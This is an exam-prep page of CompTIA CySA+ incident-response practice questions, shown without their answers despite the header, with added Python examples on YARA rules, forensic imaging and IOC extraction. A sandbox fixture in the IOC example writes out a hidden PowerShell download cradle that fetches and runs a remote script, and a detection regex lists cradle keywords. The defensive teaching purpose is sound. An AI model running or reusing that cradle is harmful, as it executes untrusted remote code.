© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

CS0-003 Incident Response and Management • Complete Question Bank

CS0-003 Incident Response and Management — All Questions With Answers

Complete CS0-003 Incident Response and Management question bank — all 0 questions with answers and detailed explanations.

Question 1 (easy, multiple choice)

During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, an analyst identifies suspicious network traffic from an internal host to a known malicious IP address. Which step should the analyst perform next to validate the alert?

Question 2 (medium, multiple choice)

An organization's security team receives an alert about a potential ransomware infection on a critical server. The severity classification is 'high' because the server supports a production database. According to the incident response plan, which containment action should be taken first to minimize data loss?

Question 3 (hard, multiple choice)

A forensic analyst is investigating a suspected data breach involving a compromised workstation. The analyst wants to collect volatile data in accordance with the order of volatility. Which sequence of data collection is correct?

Question 4 (medium, multiple choice)

After containing a malware outbreak, the incident response team performs static malware analysis on a suspicious executable. Which of the following artifacts would be most helpful in creating a YARA rule to detect variants of the malware?

Question 5 (medium, multiple choice)

During dynamic malware analysis in a sandbox, an analyst observes that the malware attempts to connect to a remote IP address on port 443, modifies the Windows registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and drops a DLL in the system32 folder. Which type of IOC is most indicative of persistence?

Question 6 (easy, multiple choice)

An organization uses MISP as its threat intelligence platform. After a security incident, the team wants to share IOCs with other trusted organizations. Which standard should they use to package and exchange the threat intelligence?

Question 7 (medium, multiple choice)

During a post-incident review, the incident response team identifies that the mean time to detect (MTTD) for a recent breach was 14 days, while the mean time to respond (MTTR) was 6 hours. Which metric should the team prioritize to improve in future incidents?

Question 8 (hard, multiple choice)

A security analyst is performing memory acquisition on a compromised Linux server using LiME. The analyst needs to capture the memory image with minimal impact on the system. Which of the following parameters should the analyst use to ensure the output is forensically sound?

Question 9 (easy, multiple choice)

An analyst receives an alert about a user account that has been locked out multiple times within an hour. The account belongs to a system administrator. Which incident category does this scenario most likely fall under?

Question 10 (medium, multiple choice)

During a forensic investigation, an analyst creates a disk image using dd with a SHA256 hash. Later, the analyst needs to verify the integrity of the image before analysis. Which command should the analyst use to compare the original hash with a newly computed hash?

Question 11 (medium, multiple choice)

An organization has been experiencing repeated phishing attacks that bypass email filters. The incident response team wants to enhance detection by creating rules based on characteristics of the phishing emails. Which of the following IOCs would be most effective for detecting similar phishing campaigns?

Question 12 (hard, multiple choice)

During a post-incident activity, the CSIRT performs a root cause analysis for a data breach. They discover that the breach originated from a misconfigured S3 bucket that allowed public read access. Which of the following actions should be included in the lessons learned to prevent recurrence?

Question 13 (medium, multi-select)

A security analyst is responding to a potential data exfiltration incident. As part of the containment strategy, the analyst must preserve evidence. Which TWO actions should the analyst take before containment? (Select two.)

Question 14 (hard, multi-select)

A CSIRT is investigating a ransomware incident that encrypted files on multiple servers. The team needs to determine the initial infection vector. Which THREE pieces of evidence should the team prioritize collecting? (Select three.)

Question 15 (easy, multi-select)

A security analyst is reviewing IOCs from a threat intelligence feed. The analyst wants to enrich the IOCs using open-source tools. Which THREE tools are commonly used for IOC enrichment? (Select three.)

Question 16 (easy, multiple choice)

During which phase of the NIST SP 800-61 incident response lifecycle would an organization conduct a lessons learned meeting?

Question 17 (medium, multiple choice)

A security analyst detects ransomware on a critical server. Which containment strategy should be implemented FIRST to minimize damage?

Question 18 (hard, multiple choice)

During a forensic investigation, an analyst needs to acquire memory from a Linux server. Which tool is specifically designed for this purpose?

Question 19 (easy, multiple choice)

Which of the following is the MOST volatile data according to the order of volatility?

Question 20 (medium, multiple choice)

An analyst is reviewing a suspicious executable using static analysis. Which of the following would provide information about the functions the executable imports from system libraries?

Question 21 (hard, multiple choice)

A SOC analyst receives an alert from a threat intelligence platform (TIP) about a new phishing campaign. The indicator is a URL. Which enrichment source is BEST for determining the URL's current hosting infrastructure?

Question 22 (medium, multiple choice)

During a post-incident review, the CSIRT identifies that the mean time to detect (MTTD) is significantly higher than the industry benchmark. Which initiative would MOST likely reduce MTTD?

Question 23 (easy, multiple choice)

An organization has identified indicators of compromise (IOCs) from a recent incident. Which data format is specifically designed for sharing threat intelligence in a standardized, machine-readable way?

Question 24 (medium, multiple choice)

A security analyst is investigating a potential data breach. The analyst needs to preserve evidence before containment. Which of the following actions is MOST appropriate at this stage?

Question 25 (hard, multiple choice)

An analyst runs a YARA rule against a set of files and gets a hit. The rule was written to detect a specific malware family. What is the PRIMARY purpose of using YARA rules in this context?

Question 26 (medium, multiple choice)

After a DDoS attack, the CSIRT wants to share IOCs with other organizations. Which protocol is specifically designed for automated, real-time threat intelligence sharing?

Question 27 (easy, multiple choice)

Which of the following is an example of a behavioral indicator of compromise (IOC) observed during dynamic malware analysis?

Question 28 (medium, multi-select)

A security analyst is investigating a phishing incident that resulted in credential theft. Which TWO actions should the analyst take as part of short-term containment? (Choose two.)

Question 29 (hard, multi-select)

During a forensic investigation, an analyst must acquire digital evidence while maintaining forensic soundness. Which THREE practices should the analyst follow? (Choose three.)

Question 30 (medium, multi-select)

A company has experienced a ransomware attack that encrypted critical servers. The incident response team is in the containment, eradication, and recovery phase. Which THREE actions are part of long-term containment? (Choose three.)

Question 31 (medium, multiple choice)

During the detection and analysis phase of incident response, a security analyst identifies suspicious outbound traffic from a workstation to an external IP address known for command and control (C2) activity. Which classification should the analyst assign to this incident?

Question 32 (easy, multiple choice)

A security analyst receives an alert about a possible ransomware outbreak. Which short-term containment action should be performed FIRST to prevent further spread?

Question 33 (hard, multiple choice)

During forensic analysis of a compromised server, an analyst needs to preserve evidence in order of volatility. Which of the following actions should the analyst perform FIRST?

Question 34 (medium, multiple choice)

A security analyst is conducting static analysis of a suspicious executable. Which of the following tools or techniques is BEST suited for extracting strings and viewing the import table?

Question 35 (medium, multiple choice)

After containing a security incident, the incident response team conducts a root cause analysis. Which of the following is the PRIMARY purpose of this activity?

Question 36 (easy, multiple choice)

An analyst receives a threat intelligence feed containing IOCs in STIX format. Which of the following BEST describes the purpose of STIX?

Question 37 (medium, multiple choice)

During post-incident activities, the security team reviews metrics. Which metric measures the average time taken to detect an incident?

Question 38 (hard, multiple choice)

A security analyst is performing dynamic analysis of a suspicious file in a sandbox. Which of the following observations is most indicative of ransomware behavior?

Question 39 (easy, multiple choice)

Which of the following is the correct order of volatility for digital evidence?

Question 40 (medium, multiple choice)

An incident responder needs to collect memory from a Linux system during an incident. Which tool should the responder use?

Question 41 (hard, multiple choice)

During a post-incident review, the team identifies that detection was delayed because alerts from multiple sources were not correlated. Which improvement would BEST address this issue?

Question 42 (medium, multiple choice)

An analyst is investigating a suspected data breach and needs to preserve network logs. Which of the following actions is MOST appropriate?

Question 43 (medium, multi-select)

A security analyst is performing incident response for a suspected malware outbreak. Which TWO actions are examples of long-term containment? (Select TWO.)

Question 44 (hard, multi-select)

During a forensic investigation, an analyst must preserve evidence in accordance with forensically sound procedures. Which THREE of the following practices should the analyst follow? (Select THREE.)

Question 45 (easy, multi-select)

An incident response team is analyzing indicators of compromise (IOCs) from a phishing campaign. Which THREE of the following are commonly used IOC types? (Select THREE.)

Question 46 (medium, multiple choice)

During the detection and analysis phase of incident response, a security analyst identifies suspicious outbound traffic from a finance workstation to a known malicious IP address at 2:00 AM. The analyst checks the firewall logs and sees a single connection. Which action should the analyst take FIRST according to NIST SP 800-61?

Question 47 (hard, multiple choice)

An organization's incident response team is handling a ransomware incident where critical servers have been encrypted. The team has identified the ransomware variant and determined that decryption is not possible. Which of the following is the BEST post-incident activity to prevent recurrence?

Question 48 (easy, multiple choice)

An analyst needs to capture the contents of volatile memory from a Windows system suspected of being compromised. Which tool should the analyst use to acquire a memory image?

Question 49 (medium, multiple choice)

During a phishing incident, an analyst extracts a URL from the email body and searches VirusTotal. The URL is associated with a credential harvesting page. Which type of indicator is this URL?

Question 50 (medium, multiple choice)

An incident responder needs to collect forensic evidence from a server that was attacked. The evidence includes network connections, running processes, memory contents, and disk data. According to the order of volatility, which piece of evidence should the responder collect FIRST?

Question 51 (hard, multiple choice)

After containing a data breach, the incident response team discovers that an attacker exfiltrated sensitive data over DNS tunneling. Which of the following detection rules would BEST identify similar activity in the future?

Question 52 (easy, multiple choice)

An organization's security team receives a report of a potential insider threat. An employee is suspected of accessing sensitive files without authorization. Which incident category BEST describes this scenario?

Question 53 (medium, multiple choice)

An incident responder is called to a server room where a critical database server is exhibiting signs of compromise. The responder must preserve evidence while preventing further damage. Which of the following is a short-term containment strategy that also preserves evidence?

Question 54 (medium, multiple choice)

A security analyst is performing static analysis on a suspicious PE file. Which initial step should the analyst take to understand the file's imports and potential capabilities?

Question 55 (easy, multiple choice)

An organization is implementing an incident response plan. Which phase of the NIST SP 800-61 lifecycle includes activities such as creating policies, establishing IR teams, and acquiring necessary tools?

Question 56 (hard, multiple choice)

During a DDoS attack, the incident response team notices that the attack traffic originates from multiple IP addresses across different countries. The team decides to implement a long-term containment strategy. Which action is MOST appropriate for long-term containment?

Question 57 (medium, multiple choice)

An analyst is examining a disk image acquired from a compromised Linux server. The analyst needs to verify that the image is an exact bit-for-bit copy of the original drive. Which forensically sound procedure should the analyst perform?

Question 58 (medium, multi-select)

An incident response team is conducting post-incident activities after a ransomware attack. The team wants to improve detection and response for future incidents. Which TWO actions are most appropriate for updating detection rules? (Select TWO.)

Question 59 (hard, multi-select)

A security analyst is investigating a potential data exfiltration incident. The analyst captures memory from a Windows system and finds a process that is injecting code into other processes. Which THREE indicators from the memory analysis would MOST strongly suggest malicious activity? (Select THREE.)

Question 60 (easy, multi-select)

An organization's incident response team is classifying an incident based on severity and priority. Which TWO factors should the team consider when determining the priority of an incident? (Select TWO.)

Question 61 (easy, multiple choice)

During the preparation phase of the NIST SP 800-61 incident response lifecycle, a security analyst is tasked with ensuring the team has the necessary tools and resources. Which of the following is the MOST important activity to perform during this phase?

Question 62 (medium, multiple choice)

A security operations center (SOC) analyst receives an alert about a potential ransomware infection on a critical server. The incident response team needs to contain the threat quickly. Which of the following should be performed FIRST as a short-term containment measure?

Question 63 (hard, multiple choice)

During a forensic investigation, an analyst needs to acquire volatile memory from a compromised Linux server running a critical application. The server cannot be powered off. Which tool should the analyst use to capture memory with the least impact on the system?

Question 64 (medium, multiple choice)

An organization has experienced a data breach involving personally identifiable information (PII). The incident response team has contained the breach and eradicated the threat. During the post-incident activity phase, which activity is MOST critical to prevent future similar incidents?

Question 65 (easy, multiple choice)

A security analyst is reviewing indicators of compromise (IOCs) from a recent phishing campaign. Which of the following is an example of an email-related IOC?

Question 66 (medium, multiple choice)

During a dynamic malware analysis session, a security analyst uses a sandbox to detonate a suspicious file. Which of the following observations would be considered a behavioral indicator of compromise (IOC)?

Question 67 (hard, multiple choice)

A security analyst is investigating a suspected insider threat incident. The analyst needs to preserve evidence before containment. Which of the following actions should the analyst prioritize to maintain the integrity of digital evidence?

Question 68 (medium, multiple choice)

An organization uses MISP (Malware Information Sharing Platform) to share threat intelligence with trusted partners. Which of the following standards is commonly used by MISP to structure and exchange threat intelligence data?

Question 69 (easy, multiple choice)

An incident responder is classifying an incident. The incident involves ransomware encrypting files on multiple workstations, causing significant business disruption. Which severity level should be assigned to this incident?

Question 70 (medium, multiple choice)

During a forensic analysis, an analyst needs to collect data in order of volatility. Which of the following represents the correct order from most volatile to least volatile?

Question 71 (hard, multiple choice)

An analyst is performing static analysis on a suspicious executable. The analyst discovers that the PE file has a suspicious section name and a high entropy value. Which tool or technique would be MOST useful for further analyzing the packed nature of the file?

Question 72 (medium, multiple choice)

After a DDoS attack, the incident response team wants to improve detection and prevention. Which of the following metrics would be MOST useful for evaluating the effectiveness of the response?

Question 73 (medium, multi-select)

A security analyst is investigating a potential malware infection on a Windows workstation. The analyst needs to collect evidence while preserving the order of volatility. Which TWO pieces of data should the analyst collect FIRST? (Select TWO.)

Question 74 (medium, multi-select)

An incident responder is performing containment of a ransomware incident that has encrypted files on several file servers. Which THREE actions are appropriate for long-term containment and recovery? (Select THREE.)

Question 75 (hard, multi-select)

During a forensic investigation, an analyst needs to acquire disk images from multiple suspect drives. Which THREE practices ensure forensic soundness? (Select THREE.)

Question 76 (medium, multiple choice)

During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, a security analyst identifies an alert indicating a high volume of outbound traffic from a critical server to an unknown IP address. Which of the following actions should the analyst perform FIRST?

Question 77 (easy, multiple choice)

A security analyst is classifying an incident where an employee's workstation is infected with ransomware that encrypts files and displays a ransom note. Which incident category and severity level best describe this scenario?

Question 78 (hard, multiple choice)

During forensic analysis of a compromised Linux server, an analyst needs to acquire memory evidence. The server is running and the analyst has root access. Which of the following tools should the analyst use to capture the contents of RAM with the least impact on the system?

Question 79 (medium, multiple choice)

A security team is responding to a phishing incident that led to credential compromise. Which of the following is the BEST short-term containment action to prevent further damage?

Question 80 (medium, multiple choice)

An analyst is performing static analysis on a suspicious executable file. Which of the following would be MOST useful to identify potential malicious behavior without executing the file?

Question 81 (hard, multiple choice)

During a post-incident review, the incident response team identifies that the mean time to detect (MTTD) for incidents is significantly higher than industry benchmarks. Which of the following improvements would most directly reduce MTTD?

Question 82 (easy, multiple choice)

Which of the following is the FIRST step in the NIST SP 800-61 incident response lifecycle?

Question 83 (medium, multiple choice)

An analyst is using YARA to create rules for detecting a specific malware strain. Which of the following pieces of information is MOST useful for writing a YARA rule?

Question 84 (medium, multiple choice)

When performing digital forensics, which of the following represents the correct order of volatility from most volatile to least volatile?

Question 85 (easy, multiple choice)

A security analyst needs to share threat intelligence with other organizations in a standardized format. Which of the following standards should the analyst use?

Question 86 (hard, multiple choice)

During a ransomware incident, the incident response team needs to preserve evidence before containment. Which of the following actions should be performed BEFORE isolating the infected system from the network?

Question 87 (medium, multiple choice)

An organization is experiencing a DDoS attack targeting its web servers. Which of the following is the BEST short-term containment strategy?

Question 88 (medium, multi-select)

A security analyst is investigating a potential data breach. The analyst needs to collect digital evidence while preserving its integrity. Which TWO actions should the analyst take? (Choose TWO.)

Question 89 (medium, multi-select)

During dynamic analysis of a suspicious file in a sandbox environment, which THREE behaviors are considered indicators of compromise (IOCs) that suggest malicious activity? (Choose THREE.)

Question 90 (easy, multi-select)

An incident response team is conducting post-incident activities after containing a malware outbreak. Which TWO activities should be included in the lessons learned phase? (Choose TWO.)

Question 91 (easy, multiple choice)

During the preparation phase of the NIST SP 800-61 incident response lifecycle, which of the following is the MOST important activity to ensure effective incident response?

Question 92 (medium, multiple choice)

A security analyst is triaging an alert indicating that a user's workstation has been infected with ransomware. The file server shows signs of encryption. The analyst needs to contain the incident. Which action should the analyst take FIRST to minimize damage?

Question 93 (hard, multiple choice)

During a forensic investigation of a compromised Linux server, the analyst needs to acquire memory for analysis. The system is running and the analyst cannot power it off. Which tool is MOST appropriate for acquiring memory in this scenario?

Question 94 (medium, multiple choice)

An analyst is investigating a suspected data breach. The analyst needs to identify which files were exfiltrated and preserve evidence. According to the order of volatility, which of the following should the analyst capture FIRST?

Question 95 (easy, multiple choice)

A security analyst is analyzing a suspicious file using static analysis. The analyst wants to identify imported functions to determine the file's capabilities. Which tool or technique is BEST suited for this task?

Question 96 (medium, multiple choice)

During dynamic analysis of a malware sample in a sandbox, the analyst observes that the malware attempts to connect to an IP address 198.51.100.23 and modifies the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which IOC type is the IP address an example of?

Question 97 (medium, multiple choice)

After containing a ransomware incident, the incident response team is conducting post-incident activities. Which action is MOST important to prevent a similar attack in the future?

Question 98 (hard, multiple choice)

An analyst is investigating a possible data exfiltration incident. The analyst has acquired a memory dump from the compromised system. Which of the following would be the BEST approach to extract evidence of exfiltration?

Question 99 (easy, multiple choice)

An organization wants to automate the sharing of threat intelligence with other trusted entities using a standardized protocol. Which protocol is specifically designed for this purpose?

Question 100 (medium, multiple choice)

During the detection and analysis phase of an incident, an analyst identifies a file with a hash that matches a known malware signature. The analyst wants to enrich this IOC with additional context. Which resource is BEST suited for this enrichment?

Question 101 (medium, multi select)

A security analyst is performing forensic analysis of a compromised system. The analyst needs to acquire disk evidence in a forensically sound manner. Which TWO actions should the analyst take to ensure the integrity of the evidence? (Choose TWO.)

Question 102 (hard, multi select)

During a malware outbreak, an incident responder uses YARA rules to detect similar malware across the environment. The responder is creating a custom YARA rule based on static analysis of the malware sample. Which THREE elements are MOST useful for creating an effective YARA rule for this malware? (Choose THREE.)
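What a rule built from static-analysis findings looks like in practice, as an added example that is not part of the page: a rule is assembled from a file-type check, a few distinctive strings (a mutex name, a C2 URI fragment), a code-byte pattern with a wildcarded immediate, and a "2 of them" threshold so that one generic string alone does not fire. The rule content and the sample blobs are constructed for illustration and are not a real signature; the small matcher implements only the slice of YARA semantics this rule uses and is not YARA itself. The rendered rule text is what you would hand to the real yara tool.

```python
"""Turn static-analysis findings into a YARA rule and check it against samples.

Added example, not from the page. The strings, hex pattern and mutex name are
constructed (not a real malware signature). The matcher implements only the
subset of YARA semantics this rule uses: uint16(0) magic test, ascii/wide text
strings, hex strings with ?? wildcards, and "N of them". It is not YARA.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Union

HexPattern = List[Optional[int]]        # None stands for a ?? wildcard byte


@dataclass
class Rule:
    name: str
    strings: Dict[str, Union[bytes, HexPattern]]
    min_strings: int                     # the N in "N of them"
    magic: Optional[int] = 0x5A4D        # uint16(0) == 0x5A4D, i.e. "MZ" (PE header)
    meta: Dict[str, str] = field(default_factory=dict)


RULE = Rule(
    name="Constructed_Loader",
    meta={"description": "constructed example, not a real signature",
          "source": "static analysis of the sample"},
    strings={
        "mutex":  b"Global\\q7z-loader-mtx",     # unique mutex name found in the binary
        "c2path": b"/gate.php?id=",              # distinctive C2 URI fragment
        "cradle": b"DownloadString",             # generic; weak evidence on its own
        "stub":   [0x55, 0x8B, 0xEC, 0x83, 0xEC, None, 0x53, 0x56],  # prologue, wildcarded immediate
    },
    min_strings=2,
)


def yara_escape(s: bytes) -> str:
    return s.decode("ascii").replace("\\", "\\\\").replace('"', '\\"')


def render(rule: Rule) -> str:
    """Emit the rule in real YARA syntax."""
    out = [f"rule {rule.name}", "{", "    meta:"]
    out += [f'        {k} = "{v}"' for k, v in rule.meta.items()]
    out.append("    strings:")
    for ident, pat in rule.strings.items():
        if isinstance(pat, bytes):
            out.append(f'        ${ident} = "{yara_escape(pat)}" ascii wide')
        else:
            body = " ".join("??" if b is None else f"{b:02X}" for b in pat)
            out.append(f"        ${ident} = {{ {body} }}")
    cond = []
    if rule.magic is not None:
        cond.append(f"uint16(0) == 0x{rule.magic:04X}")
    cond.append(f"{rule.min_strings} of them")
    out += ["    condition:", "        " + " and ".join(cond), "}"]
    return "\n".join(out)


def hex_match(data: bytes, pat: HexPattern) -> bool:
    n = len(pat)
    return any(all(b is None or data[i + j] == b for j, b in enumerate(pat))
               for i in range(len(data) - n + 1))


def text_match(data: bytes, s: bytes) -> bool:
    # "ascii wide": the plain bytes, or the same text encoded as UTF-16LE
    return s in data or s.decode("ascii").encode("utf-16-le") in data


def scan(rule: Rule, data: bytes):
    """Return (matched, [identifiers of the strings that were found])."""
    if rule.magic is not None and (len(data) < 2 or int.from_bytes(data[:2], "little") != rule.magic):
        return False, []
    hits = [ident for ident, pat in rule.strings.items()
            if (text_match(data, pat) if isinstance(pat, bytes) else hex_match(data, pat))]
    return len(hits) >= rule.min_strings, hits


# Constructed samples; "PE" here just means the blob starts with "MZ".
PAD = b"\x00" * 64
SAMPLE_HIT = b"MZ" + PAD + b"Global\\q7z-loader-mtx" + PAD + b"/gate.php?id=" + PAD
SAMPLE_WEAK = b"MZ" + PAD + b"DownloadString" + PAD           # only the generic string
SAMPLE_NOT_PE = b"#!/bin/sh\n" + b"Global\\q7z-loader-mtx /gate.php?id= DownloadString"
SAMPLE_WIDE_HEX = (b"MZ" + PAD + "Global\\q7z-loader-mtx".encode("utf-16-le")
                   + PAD + bytes([0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10, 0x53, 0x56]) + PAD)

if __name__ == "__main__":
    print(render(RULE))
    for name, blob in [("hit", SAMPLE_HIT), ("weak", SAMPLE_WEAK),
                       ("not_pe", SAMPLE_NOT_PE), ("wide_hex", SAMPLE_WIDE_HEX)]:
        print(name, scan(RULE, blob))
```

Two things the samples show: the shell script carrying all three strings does not match because the magic check fails first, and the sample with only `DownloadString` does not match because the threshold keeps a generic API name from being a signature by itself. A file hash, by contrast, would match exactly one build and belongs in a blocklist rather than in a rule meant to catch variants.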

Question 103 (medium, multi select)

An organization is experiencing a distributed denial-of-service (DDoS) attack targeting its web servers. The incident response team is implementing containment strategies. Which TWO actions are appropriate for short-term containment of a DDoS attack? (Choose TWO.)

Question 104 (medium, multi select)

After a phishing incident, the security team wants to improve detection of similar attacks in the future. Which THREE actions should the team take as part of post-incident activity? (Choose THREE.)

Question 105 (hard, multi select)

A security analyst is investigating a potential insider threat where a user is suspected of exfiltrating sensitive data via USB drives. The analyst needs to gather evidence while preserving the chain of custody. Which THREE actions should the analyst perform? (Choose THREE.)
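Forensically sound acquisition and chain of custody, as an added example that is not part of the page and that serves both the disk-acquisition question above and this USB-drive scenario: the source is copied bit for bit while being hashed, the written image is independently re-read and hashed, both digests and the acquiring handler go into a custody record, and every later hand-off re-verifies the image before it is logged. The "drive" is a constructed file in a temporary directory, and the case id, handler names and record fields are assumptions of this example. A hardware write blocker in front of the source drive is not something code can stand in for and is still required.

```python
"""Acquire a disk image while hashing it, verify the copy, and keep a
chain-of-custody record that every later handler must re-verify against.

Added example, not from the page. The "device" is a constructed file in a
temporary directory; case id, handler names and record fields are assumed.
"""
import datetime
import hashlib
import json
import os
import tempfile

CHUNK = 1024 * 1024


def _now() -> str:
    return datetime.datetime.now(datetime.timezone.utc).isoformat()


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for buf in iter(lambda: f.read(CHUNK), b""):
            h.update(buf)
    return h.hexdigest()


def image_device(src: str, dst: str) -> str:
    """Bit-for-bit copy of src into dst, hashing the source bytes as they are
    read (the same idea as piping dd through sha256sum)."""
    h = hashlib.sha256()
    with open(src, "rb") as s, open(dst, "wb") as d:
        for buf in iter(lambda: s.read(CHUNK), b""):
            h.update(buf)
            d.write(buf)
        d.flush()
        os.fsync(d.fileno())      # the verification read must hit disk, not cache
    return h.hexdigest()


def acquire(src: str, dst: str, handler: str, case_id: str, notes: str = "") -> dict:
    source_hash = image_device(src, dst)
    image_hash = sha256_file(dst)          # independent re-read of the written image
    record = {
        "case_id": case_id,
        "item": os.path.basename(src),
        "image": os.path.basename(dst),
        "source_sha256": source_hash,
        "image_sha256": image_hash,
        "verified": source_hash == image_hash,
        "notes": notes,
        "custody": [{"action": "acquired", "by": handler, "at": _now()}],
    }
    with open(dst + ".custody.json", "w") as f:
        json.dump(record, f, indent=2)
    return record


def verify_image(dst: str) -> bool:
    """True if the image still hashes to the value recorded at acquisition."""
    with open(dst + ".custody.json") as f:
        record = json.load(f)
    return sha256_file(dst) == record["image_sha256"]


def transfer(dst: str, from_handler: str, to_handler: str) -> bool:
    """Log a hand-off only after re-verifying integrity; a failed check is
    recorded as such and the transfer refused."""
    ok = verify_image(dst)
    with open(dst + ".custody.json") as f:
        record = json.load(f)
    record["custody"].append({"action": "transfer" if ok else "integrity_failure",
                              "from": from_handler, "to": to_handler, "at": _now()})
    with open(dst + ".custody.json", "w") as f:
        json.dump(record, f, indent=2)
    return ok


def demo() -> tuple:
    """Acquire a constructed drive, hand it off, then show a tampered image failing."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "sdb1.raw")
        with open(src, "wb") as f:                      # constructed device contents
            f.write(os.urandom(3 * CHUNK + 12345))
        img = os.path.join(d, "sdb1.dd")
        rec = acquire(src, img, "analyst-a", "CASE-0001", notes="USB drive, write blocker in line")
        clean = transfer(img, "analyst-a", "analyst-b")
        with open(img, "r+b") as f:                     # simulate a single flipped byte
            f.seek(100)
            original = f.read(1)
            f.seek(100)
            f.write(bytes([original[0] ^ 0xFF]))
        tampered = transfer(img, "analyst-b", "analyst-c")
        with open(img + ".custody.json") as f:
            actions = [e["action"] for e in json.load(f)["custody"]]
        return rec["verified"], clean, tampered, actions


if __name__ == "__main__":
    print(demo())
```

Hashing the source stream and the written file separately is the point: a single hash of the output would prove only that the file has not changed since it was written, not that it equals what was on the drive.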

Question 106 (medium, multiple choice)

During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, a security analyst identifies suspicious network traffic from an internal host to a known malicious IP address. Which of the following is the MOST appropriate next step?

Question 107 (hard, multiple choice)

A security analyst is performing dynamic malware analysis using a sandbox. The analyst observes that the malware creates a scheduled task that executes a PowerShell command to download a payload from a remote server. Which of the following behavioral IOCs should be prioritized for detection?
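How the observations from a sandbox run become typed indicators and, for the shareable ones, STIX 2.1 patterns of the kind exchanged over TAXII, as an added example that is not part of the page; it serves the registry-key and IP-address question, the threat-intelligence sharing question, and this scheduled-task scenario. The report below is constructed, and its field names (`network`, `registry`, `scheduled_tasks`) are an assumed schema rather than any real sandbox's output format. Indicators are labelled on two axes that are both in common use: atomic, computed or behavioral on one, network or host on the other.

```python
"""Classify sandbox observations into indicator types and express the
shareable ones as STIX 2.1 patterns (the indicator format carried over TAXII).

Added example, not from the page or any sandbox vendor. The report below is
constructed and its schema is assumed. The hash is the SHA-256 of empty input,
used only as a placeholder; addresses are RFC 5737 documentation ranges.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional

SANDBOX_REPORT = {
    "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
    "network": [
        {"dst": "198.51.100.23", "dport": 443, "proto": "tcp"},
        {"dst": "203.0.113.9", "dport": 80, "proto": "tcp",
         "uri": "http://203.0.113.9/stage2.bin"},
        {"dst": "10.0.0.5", "dport": 445, "proto": "tcp"},    # internal SMB probe
    ],
    "registry": [
        {"op": "set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
         "value": "Updater", "data": r"C:\Users\Public\upd.exe"},
    ],
    "scheduled_tasks": [
        {"name": "SysUpdate",
         "command": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.9/stage2.ps1')\""},
    ],
}


@dataclass(frozen=True)
class Ioc:
    value: str
    kind: str                   # atomic | computed | behavioral
    scope: str                  # network | host
    stix: Optional[str] = None  # STIX 2.1 pattern; only atomic/computed IOCs get one


RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)$", re.I)
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
URL_IN_CMD = re.compile(r"https?://[^\s'\")]+", re.I)


def is_external(addr: str) -> bool:
    """True for routable, non-internal addresses worth sharing as IOCs. RFC 1918
    is checked explicitly because ipaddress.is_private also flags the RFC 5737
    documentation ranges this constructed report uses."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    if ip.is_loopback or ip.is_link_local or ip.is_multicast or ip.is_unspecified:
        return False
    return not any(ip in net for net in RFC1918)


def extract_iocs(report: dict) -> list:
    found: dict = {}                          # value -> Ioc, deduplicated

    def add(ioc: Ioc) -> None:
        found.setdefault(ioc.value, ioc)

    h = report.get("sha256")
    if h:
        add(Ioc(h, "computed", "host", f"[file:hashes.'SHA-256' = '{h}']"))
    for c in report.get("network", []):
        if is_external(c["dst"]):
            add(Ioc(c["dst"], "atomic", "network", f"[ipv4-addr:value = '{c['dst']}']"))
        if c.get("uri"):
            add(Ioc(c["uri"], "atomic", "network", f"[url:value = '{c['uri']}']"))
    for r in report.get("registry", []):
        if r["op"] == "set" and RUN_KEY.search(r["key"]):
            add(Ioc(f"Run-key persistence: {r['key']}\\{r['value']} = {r['data']}",
                    "behavioral", "host"))
    for t in report.get("scheduled_tasks", []):
        cmd = t["command"]
        desc = f"scheduled task '{t['name']}' runs: {cmd}"
        if re.search(r"powershell", cmd, re.I) and CRADLE.search(cmd):
            desc = "download cradle via " + desc
            for u in URL_IN_CMD.findall(cmd):   # the staging URL is itself an atomic IOC
                add(Ioc(u, "atomic", "network", f"[url:value = '{u}']"))
        add(Ioc(desc, "behavioral", "host"))
    return list(found.values())


def by_kind(iocs: list, kind: str) -> list:
    return [i for i in iocs if i.kind == kind]


def stix_patterns(iocs: list) -> list:
    return [i.stix for i in iocs if i.stix]


if __name__ == "__main__":
    for ioc in extract_iocs(SANDBOX_REPORT):
        print(f"{ioc.kind:10} {ioc.scope:8} {ioc.stix or ioc.value}")
```

The behavioral entries carry no STIX pattern here on purpose: the Run-key write and the scheduled-task download cradle are the durable detections (the attacker can rotate the IP and the hash far more cheaply than the persistence technique), but they are expressed as detection logic for the SIEM or EDR rather than as a single observable to be matched. The internal 10.0.0.5 probe is kept out of the shareable set, since an RFC 1918 address means nothing to another organisation.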

Question 108 (medium, multi select)

A security team is responding to a suspected data breach involving exfiltration of customer data via email. During the containment phase, which TWO actions should the team perform to preserve evidence while preventing further data loss? (Choose TWO.)

Question 109 (easy, multi select)

During a post-incident review, a security analyst identifies that the mean time to detect (MTTD) for incidents is significantly higher than the industry benchmark. Which THREE actions should the analyst recommend to improve detection capabilities? (Choose THREE.)
